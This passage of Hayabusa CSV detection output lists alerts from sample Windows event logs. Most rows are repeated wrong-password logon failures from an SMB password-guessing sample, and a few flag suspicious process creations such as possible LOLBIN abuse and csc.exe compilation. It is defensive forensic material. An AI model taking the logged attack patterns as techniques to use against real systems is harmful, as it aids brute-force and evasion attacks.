NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:46.645 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: IXlzxK5OXL9hpqrZ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:46.680 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 2cLdgWvrVh7h2jPk | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:46.717 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: h34xlYavVsXQRCYG | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:46.760 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 6wjflwqXyFzYTi0b | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:46.795 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: MlsuCSajqGUYTBWL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:46.832 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: xQDdrQQZ5xYBDiRi | IP Addr: 
192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:46.872 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: JX5NMuwUsOZEp3zh | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:46.918 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: JfrbGLqKGru8AE2a | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:46.961 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 813natbodi6QauRW | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:47.000 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: KpfKxOZG3xSr5Yqm | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:47.044 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: fErWiEb0USDghXsB | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:47.083 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 
fOWF6YnW8UEPlw41 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:47.124 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: SNPXuHduatLFQc8W | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:47.157 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 35rfur4MzKzwxCIn | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:47.201 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: VmAqzaZaeoSjcuh5 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:47.238 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: lKuCpuGcGmDOoewr | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:47.281 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Bz6SOAeTyqsBz6Oa | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:47.317 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | 
Type: 3 | Computer: CSURiEoC7dw0w0ru | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:47.369 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: bDjwkaHT8lrFmn9X | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:47.417 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ayI129HgVWA5q4Sk | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:47.456 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: jT2yiuOJS8Fvf9SD | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:47.495 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 1hpAO2UrjFd6Kxt0 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:47.537 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ZkgGj9Fnqn3XwnBT | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:47.573 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: 
Administrator | Type: 3 | Computer: WFXPYo0yzR7p8dNU | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:47.624 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 9j6MxN7PuM29Vlcq | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:47.660 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: w1CWIqoV6GzmmlRm | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:47.696 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: uiBfvnfTcIG4xJoi | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:47.741 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: dED7HYntoE5D7XvG | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:47.781 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: pX1ztnCKiePrPbTT | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:47.824 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - 
Wrong Password,User: Administrator | Type: 3 | Computer: u3XQcfMHJDsBtJDy | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:47.864 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: MhRsRIS5tHKLv2oL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:47.917 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: JmkLhptugDU2fDWp | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:47.952 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 2yk62yREbgDCj9pB | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:47.997 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 6JPvkmaAsJlwn9t3 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:48.034 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: lhciP1zM9njlRI3j | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:48.069 
+00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: duNDenwdo1oHVuoL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:48.114 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 0ChBZOYkTm1SguA1 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:48.161 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: RU38tuiKC0weexmb | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:48.196 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: jg0Hp4xtz0pAMhCz | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:48.231 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 5AorVNz5MgTeEvn2 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:48.275 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 8oJ6tVjBxlYyj5ej | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 
+2016-09-19 16:52:48.316 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: oEAEOi0TsSRVPlz4 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:48.364 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: USfEwKkH8OUADVds | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:48.400 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: y0jg1i6tDiInd10i | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:48.441 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Xv2jRzrgoP6lJdAJ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:48.485 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: LmuAXUwSkhR3tSRg | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:48.535 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Zy4Fkpvcrlmp9AES | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:48.572 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 51ipUXvrRh0CPH1e | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:48.670 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 5TB15XKzVJwIyjqU | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:48.713 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: i1F6muFPBlPyHPbR | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:48.752 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: XNXwYS73RElHozUo | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:48.793 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ft1MLPJISeq0bMsa | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:48.845 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: i8kbFOwQiCyRVMDV | IP Addr: 
192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:48.879 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ToPzuDEmXN1fjIcS | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:48.924 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: pKF1QKEuTXIGnrx2 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:48.964 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: fyHpo6pX8TEo6ttv | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:49.000 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 3uYqEt90yr8B3rK9 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:49.048 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 2LKkrM0slVn0CKHw | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:49.080 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 
TyJ82cfaddnc8c6D | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:49.120 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: KJRw0S82SupmuS4Y | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:49.161 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: z4lSo9BMWdcPLfLb | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:49.208 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: XreSLg472qhJw0R3 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:49.266 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: KIJcQJKLmnjrE2T9 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:49.309 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: zlddo3GCTEIkFyi9 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:49.359 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | 
Type: 3 | Computer: hxiZoB5mHR2tGUFM | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:49.399 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: fpEbpiox2Q3Qf8av | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:54:20.381 +00:00,IE10Win7,4688,low,Evas,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation_builtin/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-19 16:54:20.959 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\rundll32.exe aepdu.dll,AePduRunUpdate | Path: C:\Windows\System32\rundll32.exe | PID: 0x438 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-19 16:54:20.959 +00:00,IE10Win7,4688,low,Evas,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation_builtin/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-19 16:54:20.959 +00:00,IE10Win7,4688,medium,,Rundll32 From Abnormal Drive,,rules/sigma/process_creation_builtin/proc_creation_win_rundll32_not_from_c_drive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-19 16:54:22.866 +00:00,IE10Win7,4688,low,Evas,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation_builtin/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-19 16:54:22.866 +00:00,IE10Win7,4688,high,Evas,Suspicious Svchost 
Process,,rules/sigma/process_creation_builtin/proc_creation_win_susp_svchost.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-19 16:55:28.022 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} | Path: C:\Windows\System32\dllhost.exe | PID: 0x338 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-19 16:55:39.187 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} | Path: C:\Windows\System32\dllhost.exe | PID: 0x658 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-19 17:00:27.606 +00:00,IE10Win7,4688,low,Evas,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation_builtin/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-19 17:43:48.282 +00:00,IE10Win7,4688,low,Evas,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation_builtin/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-19 17:43:48.712 +00:00,IE10Win7,4688,medium,Evas,Suspicious Csc.exe Source File Folder,,rules/sigma/process_creation_builtin/proc_creation_win_susp_csc_folder.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-19 17:43:48.712 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe"" /noconfig /fullpaths @""C:\Users\IEUser\AppData\Local\Temp\8xpeyiyp.cmdline"" | Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe 
